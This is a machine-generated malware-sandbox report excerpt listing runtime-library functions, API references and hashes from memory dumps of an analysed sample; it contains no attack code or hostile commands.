Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5

Function 0248D652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0248D6AA
__Xtime_diff_to_millis2.LIBCPMT ref: 0248D6C4
_xtime_get.LIBCPMT ref: 0248D6E7
__Xtime_diff_to_millis2.LIBCPMT ref: 0248D6F3

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: 827b38b793d36ea6e6b2ea5190882c8299208065755ca927c20d4dfeddb356d8
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: 42214C75E11209AFDF00FFA5CC819BEB7B9EF09714F10006AE501A7290D770AD018BA0

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 024A9330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 024A934A

Part of subcall function 024A9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024A92C6
Part of subcall function 024A9297: ___AdjustPointer.LIBCMT ref: 024A92E1

_UnwindNestedFrames.LIBCMT ref: 024A935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024A9370
CallCatchBlock.LIBVCRUNTIME ref: 024A9398

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: dd7902a0b168ea5682338f3260862cf75cc75035effb19eefb516b138c717781
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 1B011732100148BBCF125E96CC50EEB3F7AEF58754F05441AFE0896120D372E861EBA0

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 024B5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378), ref: 024B51C8
GetLastError.KERNEL32(?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024B2213), ref: 024B51D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024B51E2

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 66b8974f1e5ee743916ce639f37f79aeb4b5764888c21c1d9fe9e225dac22382
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 8001F736A02322ABC7234F799C44E97FB98AF46FA27540631F906E7240C720D941CAF4

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 024A6395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024A63AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024A63C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024A63DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024A63F3

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 3bec27d665a3d3717b1a3808e02f7a4e078401cc44891030c8c417e18893cc7d
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 9601D632600114B7CF16EE5AC860AAF779E9F65750F05005BEC21AB381DAB0ED128BA0

Function 024A2B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 024A2BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024A2BCF

Part of subcall function 02498687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024986A8
Part of subcall function 02498687: Hash.LIBCMT ref: 024986E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024A2BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024A2BF8

Part of subcall function 0249F6DF: Hash.LIBCMT ref: 0249F6F1

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: a6b3322d4b83997d53398a9e39bde1422cbac09e96d07a3371cc48c22dd9c190
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: C1117C76400204AFC715DF65C880ACAFBF9BF59320B014A1EE9568B591DBB0A914CBA0

Function 024A2B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 024A2BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024A2BCF

Part of subcall function 02498687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024986A8
Part of subcall function 02498687: Hash.LIBCMT ref: 024986E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024A2BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024A2BF8

Part of subcall function 0249F6DF: Hash.LIBCMT ref: 0249F6F1

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: be4a4b3d581b6e66caf45d2d5b2ad42161672202806dbcd7acd34a4724b8dfce
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 58012D76410604ABC714DF66C881EDAF7E9FF59310F008A1EE55687550DBB0F954CF60

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 024850CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 024850D1

Part of subcall function 0248BDAE: __EH_prolog3_GS.LIBCMT ref: 0248BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0248511C
__Getcoll.LIBCPMT ref: 0248512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0248513B

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 5a16ee00e9a584453990e86ad8480014c5bc187271322bba7073226ba3c9bbe9
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: B5018872D21208AFDB04FFA5C480BADBBB2BF54315F50802FD055AB280DB749584CFA1

Function 02485B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02485B8D

Part of subcall function 0248BDAE: __EH_prolog3_GS.LIBCMT ref: 0248BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02485BD8
__Getcoll.LIBCPMT ref: 02485BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02485BF7

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 00f1e3fa62b0cdf8d9b5797c7a9d18da9a67237fba80cabd9777ea8b6fb86896
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: 200148729212089FDB04FFA5D484BADBBB1BF54325F50802FD055AB280DBB89984CFA5

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 0249C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C1A4

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 924b2012034765f75be822235018525e58794493cc26a8d2fd43b45b17ca7db3
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: EA01C47A504149BBDF139E94EC828AE3F66AF6E350F088517F91884170D732C6B1EF85

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 02493773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0249378C

Part of subcall function 02492B16: ___crtGetTimeFormatEx.LIBCMT ref: 02492B2C
Part of subcall function 02492B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02492B4B

GetLastError.KERNEL32 ref: 024937A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024937BE
__CxxThrowException@8.LIBVCRUNTIME ref: 024937CC

Part of subcall function 024928EC: SetThreadPriority.KERNEL32(?,?), ref: 024928F8

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 8622be4b170f9abb9ea511820c72f3ce94b38cb5fe23583529433e6e242052c8
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 5EF0A7B2A002153ADB20FB765C0AFBB3EAC9B11B51F50496FB905E6181EED9D4048AB5

Function 0248D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02491342

Part of subcall function 02490BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02490BD6
Part of subcall function 02490BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02490BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02491355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02491361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0249136A

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: 56b10c06773fd70edfe384cd871a397b27aa1454853719aef869861930285ec3
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 37F0B431640716ABAF247EBA081197E39A79F51314B04416FD51A9F3C0DFB19E019A94

Function 0249D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0249D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0249D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0249D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0249D0CD

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: c2c36d04806251c681300089731a32846e2a6f0cdfc95268f4f24ee9a765d5f3
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: EEF05235E00204E7CF24FB62D840CAEBB7A9E90B18760852FD80517285DF31A90ACEA2

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
